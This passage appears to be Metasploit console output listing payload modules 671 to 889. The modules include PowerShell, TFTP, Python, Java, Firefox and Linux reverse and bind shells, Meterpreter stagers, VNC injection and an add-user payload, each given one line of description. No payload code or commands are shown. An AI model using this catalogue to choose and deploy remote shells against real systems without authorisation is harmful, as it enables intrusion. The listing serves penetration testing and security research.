   671   payload/cmd/windows/powershell/vncinject/reverse_http                                       normal  No     Powershell Exec, Windows Reverse HTTP Stager (wininet)
   672   payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore                          normal  No     Powershell Exec, Reverse HTTP Stager Proxy
   673   payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp                                   normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   674   payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp                                   normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   675   payload/cmd/windows/powershell/vncinject/reverse_ord_tcp                                    normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   676   payload/cmd/windows/powershell/vncinject/reverse_tcp                                        normal  No     Powershell Exec, Reverse TCP Stager
   677   payload/cmd/windows/powershell/vncinject/reverse_tcp_allports                               normal  No     Powershell Exec, Reverse All-Port TCP Stager
   678   payload/cmd/windows/powershell/vncinject/reverse_tcp_dns                                    normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   679   payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4                                    normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   680   payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns                                normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   681   payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid                                   normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   682   payload/cmd/windows/powershell/vncinject/reverse_winhttp                                    normal  No     Powershell Exec, Windows Reverse HTTP Stager (winhttp)
   683   payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp                                     normal  No     Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
   684   payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid                                normal  No     Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
   685   payload/cmd/windows/powershell/x64/custom/bind_named_pipe                                   normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager
   686   payload/cmd/windows/powershell/x64/custom/bind_tcp                                          normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager
   687   payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4                                      normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   688   payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid                                     normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
   689   payload/cmd/windows/powershell/x64/custom/reverse_http                                      normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   690   payload/cmd/windows/powershell/x64/custom/reverse_https                                     normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   691   payload/cmd/windows/powershell/x64/custom/reverse_named_pipe                                normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
   692   payload/cmd/windows/powershell/x64/custom/reverse_tcp                                       normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager
   693   payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4                                   normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   694   payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid                                  normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
   695   payload/cmd/windows/powershell/x64/custom/reverse_winhttp                                   normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
   696   payload/cmd/windows/powershell/x64/custom/reverse_winhttps                                  normal  No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
   697   payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp                              normal  No     Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager
   698   payload/cmd/windows/powershell/x64/exec                                                     normal  No     Powershell Exec, Windows x64 Execute Command
   699   payload/cmd/windows/powershell/x64/loadlibrary                                              normal  No     Powershell Exec, Windows x64 LoadLibrary Path
   700   payload/cmd/windows/powershell/x64/messagebox                                               normal  No     Powershell Exec, Windows MessageBox x64
   701   payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp                                normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager
   702   payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid                           normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
   703   payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe                              normal  No     Powershell Exec, Windows x64 Bind Named Pipe Stager
   704   payload/cmd/windows/powershell/x64/meterpreter/bind_tcp                                     normal  No     Powershell Exec, Windows x64 Bind TCP Stager
   705   payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4                                 normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   706   payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid                                normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
   707   payload/cmd/windows/powershell/x64/meterpreter/reverse_http                                 normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
   708   payload/cmd/windows/powershell/x64/meterpreter/reverse_https                                normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
   709   payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe                           normal  No     Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
   710   payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp                                  normal  No     Powershell Exec, Windows x64 Reverse TCP Stager
   711   payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4                              normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   712   payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid                             normal  No     Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
   713   payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp                              normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)
   714   payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps                             normal  No     Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)
   715   payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp                                   normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager
   716   payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid                              normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
   717   payload/cmd/windows/powershell/x64/peinject/bind_named_pipe                                 normal  No     Powershell Exec, Windows x64 Bind Named Pipe Stager
   718   payload/cmd/windows/powershell/x64/peinject/bind_tcp                                        normal  No     Powershell Exec, Windows x64 Bind TCP Stager
   719   payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4                                    normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   720   payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid                                   normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
   721   payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe                              normal  No     Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
   722   payload/cmd/windows/powershell/x64/peinject/reverse_tcp                                     normal  No     Powershell Exec, Windows x64 Reverse TCP Stager
   723   payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4                                 normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   724   payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid                                normal  No     Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
   725   payload/cmd/windows/powershell/x64/pingback_reverse_tcp                                     normal  No     Powershell Exec, Windows x64 Pingback, Reverse TCP Inline
   726   payload/cmd/windows/powershell/x64/powershell_bind_tcp                                      normal  No     Powershell Exec
   727   payload/cmd/windows/powershell/x64/powershell_reverse_tcp                                   normal  No     Powershell Exec
   728   payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl                               normal  No     Powershell Exec
   729   payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp                                      normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   730   payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid                                 normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   731   payload/cmd/windows/powershell/x64/shell/bind_named_pipe                                    normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   732   payload/cmd/windows/powershell/x64/shell/bind_tcp                                           normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 Bind TCP Stager
   733   payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4                                       normal  No     Powershell Exec, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   734   payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid                                      normal  No     Powershell Exec, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   735   payload/cmd/windows/powershell/x64/shell/reverse_tcp                                        normal  No     Powershell Exec, Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   736   payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4                                    normal  No     Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   737   payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid                                   normal  No     Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   738   payload/cmd/windows/powershell/x64/shell_bind_tcp                                           normal  No     Powershell Exec, Windows x64 Command Shell, Bind TCP Inline
   739   payload/cmd/windows/powershell/x64/shell_reverse_tcp                                        normal  No     Powershell Exec, Windows x64 Command Shell, Reverse TCP Inline
   740   payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp                                  normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager
   741   payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid                             normal  No     Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support
   742   payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe                                normal  No     Powershell Exec, Windows x64 Bind Named Pipe Stager
   743   payload/cmd/windows/powershell/x64/vncinject/bind_tcp                                       normal  No     Powershell Exec, Windows x64 Bind TCP Stager
   744   payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4                                   normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   745   payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid                                  normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)
   746   payload/cmd/windows/powershell/x64/vncinject/reverse_http                                   normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
   747   payload/cmd/windows/powershell/x64/vncinject/reverse_https                                  normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)
   748   payload/cmd/windows/powershell/x64/vncinject/reverse_tcp                                    normal  No     Powershell Exec, Windows x64 Reverse TCP Stager
   749   payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4                                normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   750   payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid                               normal  No     Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
   751   payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp                                normal  No     Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)
   752   payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps                               normal  No     Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)
   753   payload/cmd/windows/powershell_bind_tcp                                                     normal  No     Windows Interactive Powershell Session, Bind TCP
   754   payload/cmd/windows/powershell_reverse_tcp                                                  normal  No     Windows Interactive Powershell Session, Reverse TCP
   755   payload/cmd/windows/powershell_reverse_tcp_ssl                                              normal  No     Windows Interactive Powershell Session, Reverse TCP SSL
   756   payload/cmd/windows/python/meterpreter/bind_tcp                                             normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager
   757   payload/cmd/windows/python/meterpreter/bind_tcp_uuid                                        normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
   758   payload/cmd/windows/python/meterpreter/reverse_http                                         normal  No     Python Exec, Python Meterpreter, Python Reverse HTTP Stager
   759   payload/cmd/windows/python/meterpreter/reverse_https                                        normal  No     Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
   760   payload/cmd/windows/python/meterpreter/reverse_tcp                                          normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager
   761   payload/cmd/windows/python/meterpreter/reverse_tcp_ssl                                      normal  No     Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
   762   payload/cmd/windows/python/meterpreter/reverse_tcp_uuid                                     normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
   763   payload/cmd/windows/python/meterpreter_bind_tcp                                             normal  No     Python Exec, Python Meterpreter Shell, Bind TCP Inline
   764   payload/cmd/windows/python/meterpreter_reverse_http                                         normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
   765   payload/cmd/windows/python/meterpreter_reverse_https                                        normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
   766   payload/cmd/windows/python/meterpreter_reverse_tcp                                          normal  No     Python Exec, Python Meterpreter Shell, Reverse TCP Inline
   767   payload/cmd/windows/python/pingback_bind_tcp                                                normal  No     Python Exec, Python Pingback, Bind TCP (via python)
   768   payload/cmd/windows/python/pingback_reverse_tcp                                             normal  No     Python Exec, Python Pingback, Reverse TCP (via python)
   769   payload/cmd/windows/python/shell_bind_tcp                                                   normal  No     Python Exec, Command Shell, Bind TCP (via python)
   770   payload/cmd/windows/python/shell_reverse_sctp                                               normal  No     Python Exec, Command Shell, Reverse SCTP (via python)
   771   payload/cmd/windows/python/shell_reverse_tcp                                                normal  No     Python Exec, Command Shell, Reverse TCP (via python)
   772   payload/cmd/windows/python/shell_reverse_tcp_ssl                                            normal  No     Python Exec, Command Shell, Reverse TCP SSL (via python)
   773   payload/cmd/windows/python/shell_reverse_udp                                                normal  No     Python Exec, Command Shell, Reverse UDP (via python)
   774   payload/cmd/windows/reverse_lua                                                             normal  No     Windows Command Shell, Reverse TCP (via Lua)
   775   payload/cmd/windows/reverse_perl                                                            normal  No     Windows Command, Double Reverse TCP Connection (via Perl)
   776   payload/cmd/windows/reverse_powershell                                                      normal  No     Windows Command Shell, Reverse TCP (via Powershell)
   777   payload/cmd/windows/reverse_ruby                                                            normal  No     Windows Command Shell, Reverse TCP (via Ruby)
   778   payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp                                           normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
   779   payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid                                      normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support
   780   payload/cmd/windows/tftp/x64/custom/bind_named_pipe                                         normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager
   781   payload/cmd/windows/tftp/x64/custom/bind_tcp                                                normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager
   782   payload/cmd/windows/tftp/x64/custom/bind_tcp_rc4                                            normal  No     TFTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   783   payload/cmd/windows/tftp/x64/custom/bind_tcp_uuid                                           normal  No     TFTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)
   784   payload/cmd/windows/tftp/x64/custom/reverse_http                                            normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   785   payload/cmd/windows/tftp/x64/custom/reverse_https                                           normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)
   786   payload/cmd/windows/tftp/x64/custom/reverse_named_pipe                                      normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
   787   payload/cmd/windows/tftp/x64/custom/reverse_tcp                                             normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager
   788   payload/cmd/windows/tftp/x64/custom/reverse_tcp_rc4                                         normal  No     TFTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   789   payload/cmd/windows/tftp/x64/custom/reverse_tcp_uuid                                        normal  No     TFTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)
   790   payload/cmd/windows/tftp/x64/custom/reverse_winhttp                                         normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)
   791   payload/cmd/windows/tftp/x64/custom/reverse_winhttps                                        normal  No     TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)
   792   payload/cmd/windows/tftp/x64/encrypted_shell/reverse_tcp                                    normal  No     TFTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager
   793   payload/cmd/windows/tftp/x64/encrypted_shell_reverse_tcp                                    normal  No     TFTP Fetch, Windows Encrypted Reverse Shell
   794   payload/cmd/windows/tftp/x64/exec                                                           normal  No     TFTP Fetch, Windows x64 Execute Command
   795   payload/cmd/windows/tftp/x64/loadlibrary                                                    normal  No     TFTP Fetch, Windows x64 LoadLibrary Path
   796   payload/cmd/windows/tftp/x64/messagebox                                                     normal  No     TFTP Fetch, Windows MessageBox x64
   797   payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp                                      normal  No     TFTP Fetch, Windows x64 IPv6 Bind TCP Stager
   798   payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid                                 normal  No     TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support
   799   payload/cmd/windows/tftp/x64/meterpreter/bind_named_pipe                                    normal  No     TFTP Fetch, Windows x64 Bind Named Pipe Stager
   800   payload/cmd/windows/tftp/x64/meterpreter/bind_tcp                                           normal  No     TFTP Fetch, Windows x64 Bind TCP Stager
   801   payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4                                       normal  No     TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   802   payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid                                      normal  No     TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)
   803   payload/cmd/windows/tftp/x64/meterpreter/reverse_http                                       normal  No     TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)
   804   payload/cmd/windows/tftp/x64/meterpreter/reverse_https                                      normal  No     TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)
   805   payload/cmd/windows/tftp/x64/meterpreter/reverse_named_pipe                                 normal  No     TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager
   806   payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp                                        normal  No     TFTP Fetch, Windows x64 Reverse TCP Stager
   807   payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4                                    normal  No     TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   808   payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid                                   normal  No     TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)
   809   payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttp                                    normal  No     TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)
   810   payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttps                                   normal  No     TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)
   811   payload/cmd/windows/tftp/x64/meterpreter_bind_named_pipe                                    normal  No     TFTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   812   payload/cmd/windows/tftp/x64/meterpreter_bind_tcp                                           normal  No     TFTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)
   813   payload/cmd/windows/tftp/x64/meterpreter_reverse_http                                       normal  No     TFTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   814   payload/cmd/windows/tftp/x64/meterpreter_reverse_https                                      normal  No     TFTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   815   payload/cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp                                   normal  No     TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   816   payload/cmd/windows/tftp/x64/meterpreter_reverse_tcp                                        normal  No     TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64
   817   payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp                                         normal  No     TFTP Fetch, Windows x64 IPv6 Bind TCP Stager
   818   payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid                                    normal  No     TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support
   819   payload/cmd/windows/tftp/x64/peinject/bind_named_pipe                                       normal  No     TFTP Fetch, Windows x64 Bind Named Pipe Stager
   820   payload/cmd/windows/tftp/x64/peinject/bind_tcp                                              normal  No     TFTP Fetch, Windows x64 Bind TCP Stager
   821   payload/cmd/windows/tftp/x64/peinject/bind_tcp_rc4                                          normal  No     TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   822   payload/cmd/windows/tftp/x64/peinject/bind_tcp_uuid                                         normal  No     TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)
   823   payload/cmd/windows/tftp/x64/peinject/reverse_named_pipe                                    normal  No     TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager
   824   payload/cmd/windows/tftp/x64/peinject/reverse_tcp                                           normal  No     TFTP Fetch, Windows x64 Reverse TCP Stager
   825   payload/cmd/windows/tftp/x64/peinject/reverse_tcp_rc4                                       normal  No     TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   826   payload/cmd/windows/tftp/x64/peinject/reverse_tcp_uuid                                      normal  No     TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)
   827   payload/cmd/windows/tftp/x64/pingback_reverse_tcp                                           normal  No     TFTP Fetch, Windows x64 Pingback, Reverse TCP Inline
   828   payload/cmd/windows/tftp/x64/powershell_bind_tcp                                            normal  No     TFTP Fetch
   829   payload/cmd/windows/tftp/x64/powershell_reverse_tcp                                         normal  No     TFTP Fetch
   830   payload/cmd/windows/tftp/x64/powershell_reverse_tcp_ssl                                     normal  No     TFTP Fetch
   831   payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp                                            normal  No     TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   832   payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid                                       normal  No     TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   833   payload/cmd/windows/tftp/x64/shell/bind_named_pipe                                          normal  No     TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   834   payload/cmd/windows/tftp/x64/shell/bind_tcp                                                 normal  No     TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager
   835   payload/cmd/windows/tftp/x64/shell/bind_tcp_rc4                                             normal  No     TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   836   payload/cmd/windows/tftp/x64/shell/bind_tcp_uuid                                            normal  No     TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   837   payload/cmd/windows/tftp/x64/shell/reverse_tcp                                              normal  No     TFTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   838   payload/cmd/windows/tftp/x64/shell/reverse_tcp_rc4                                          normal  No     TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   839   payload/cmd/windows/tftp/x64/shell/reverse_tcp_uuid                                         normal  No     TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   840   payload/cmd/windows/tftp/x64/shell_bind_tcp                                                 normal  No     TFTP Fetch, Windows x64 Command Shell, Bind TCP Inline
   841   payload/cmd/windows/tftp/x64/shell_reverse_tcp                                              normal  No     TFTP Fetch, Windows x64 Command Shell, Reverse TCP Inline
   842   payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp                                        normal  No     TFTP Fetch, Windows x64 IPv6 Bind TCP Stager
   843   payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid                                   normal  No     TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support
   844   payload/cmd/windows/tftp/x64/vncinject/bind_named_pipe                                      normal  No     TFTP Fetch, Windows x64 Bind Named Pipe Stager
   845   payload/cmd/windows/tftp/x64/vncinject/bind_tcp                                             normal  No     TFTP Fetch, Windows x64 Bind TCP Stager
   846   payload/cmd/windows/tftp/x64/vncinject/bind_tcp_rc4                                         normal  No     TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   847   payload/cmd/windows/tftp/x64/vncinject/bind_tcp_uuid                                        normal  No     TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)
   848   payload/cmd/windows/tftp/x64/vncinject/reverse_http                                         normal  No     TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)
   849   payload/cmd/windows/tftp/x64/vncinject/reverse_https                                        normal  No     TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)
   850   payload/cmd/windows/tftp/x64/vncinject/reverse_tcp                                          normal  No     TFTP Fetch, Windows x64 Reverse TCP Stager
   851   payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4                                      normal  No     TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   852   payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid                                     normal  No     TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)
   853   payload/cmd/windows/tftp/x64/vncinject/reverse_winhttp                                      normal  No     TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)
   854   payload/cmd/windows/tftp/x64/vncinject/reverse_winhttps                                     normal  No     TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)
   855   payload/firefox/exec                                                                        normal  No     Firefox XPCOM Execute Command
   856   payload/firefox/shell_bind_tcp                                                              normal  No     Command Shell, Bind TCP (via Firefox XPCOM script)
   857   payload/firefox/shell_reverse_tcp                                                           normal  No     Command Shell, Reverse TCP (via Firefox XPCOM script)
   858   payload/generic/custom                                                                      normal  No     Custom Payload
   859   payload/generic/debug_trap                                                                  normal  No     Generic x86 Debug Trap
   860   payload/generic/shell_bind_aws_ssm                                                          normal  No     Command Shell, Bind SSM (via AWS API)
   861   payload/generic/shell_bind_tcp                                                              normal  No     Generic Command Shell, Bind TCP Inline
   862   payload/generic/shell_reverse_tcp                                                           normal  No     Generic Command Shell, Reverse TCP Inline
   863   payload/generic/ssh/interact                                                                normal  No     Interact with Established SSH Connection
   864   payload/generic/tight_loop                                                                  normal  No     Generic x86 Tight Loop
   865   payload/java/jsp_shell_bind_tcp                                                             normal  No     Java JSP Command Shell, Bind TCP Inline
   866   payload/java/jsp_shell_reverse_tcp                                                          normal  No     Java JSP Command Shell, Reverse TCP Inline
   867   payload/java/meterpreter/bind_tcp                                                           normal  No     Java Meterpreter, Java Bind TCP Stager
   868   payload/java/meterpreter/reverse_http                                                       normal  No     Java Meterpreter, Java Reverse HTTP Stager
   869   payload/java/meterpreter/reverse_https                                                      normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   870   payload/java/meterpreter/reverse_tcp                                                        normal  No     Java Meterpreter, Java Reverse TCP Stager
   871   payload/java/shell/bind_tcp                                                                 normal  No     Command Shell, Java Bind TCP Stager
   872   payload/java/shell/reverse_tcp                                                              normal  No     Command Shell, Java Reverse TCP Stager
   873   payload/java/shell_reverse_tcp                                                              normal  No     Java Command Shell, Reverse TCP Inline
   874   payload/linux/aarch64/meterpreter/reverse_tcp                                               normal  No     Linux Meterpreter, Reverse TCP Stager
   875   payload/linux/aarch64/meterpreter_reverse_http                                              normal  No     Linux Meterpreter, Reverse HTTP Inline
   876   payload/linux/aarch64/meterpreter_reverse_https                                             normal  No     Linux Meterpreter, Reverse HTTPS Inline
   877   payload/linux/aarch64/meterpreter_reverse_tcp                                               normal  No     Linux Meterpreter, Reverse TCP Inline
   878   payload/linux/aarch64/shell/reverse_tcp                                                     normal  No     Linux dup2 Command Shell, Reverse TCP Stager
   879   payload/linux/aarch64/shell_reverse_tcp                                                     normal  No     Linux Command Shell, Reverse TCP Inline
   880   payload/linux/armbe/meterpreter_reverse_http                                                normal  No     Linux Meterpreter, Reverse HTTP Inline
   881   payload/linux/armbe/meterpreter_reverse_https                                               normal  No     Linux Meterpreter, Reverse HTTPS Inline
   882   payload/linux/armbe/meterpreter_reverse_tcp                                                 normal  No     Linux Meterpreter, Reverse TCP Inline
   883   payload/linux/armbe/shell_bind_tcp                                                          normal  No     Linux ARM Big Endian Command Shell, Bind TCP Inline
   884   payload/linux/armle/adduser                                                                 normal  No     Linux Add User
   885   payload/linux/armle/exec                                                                    normal  No     Linux Execute Command
   886   payload/linux/armle/meterpreter/bind_tcp                                                    normal  No     Linux Meterpreter, Bind TCP Stager
   887   payload/linux/armle/meterpreter/reverse_tcp                                                 normal  No     Linux Meterpreter, Reverse TCP Stager
   888   payload/linux/armle/meterpreter_reverse_http                                                normal  No     Linux Meterpreter, Reverse HTTP Inline
   889   payload/linux/armle/meterpreter_reverse_https                                               normal  No     Linux Meterpreter, Reverse HTTPS Inline
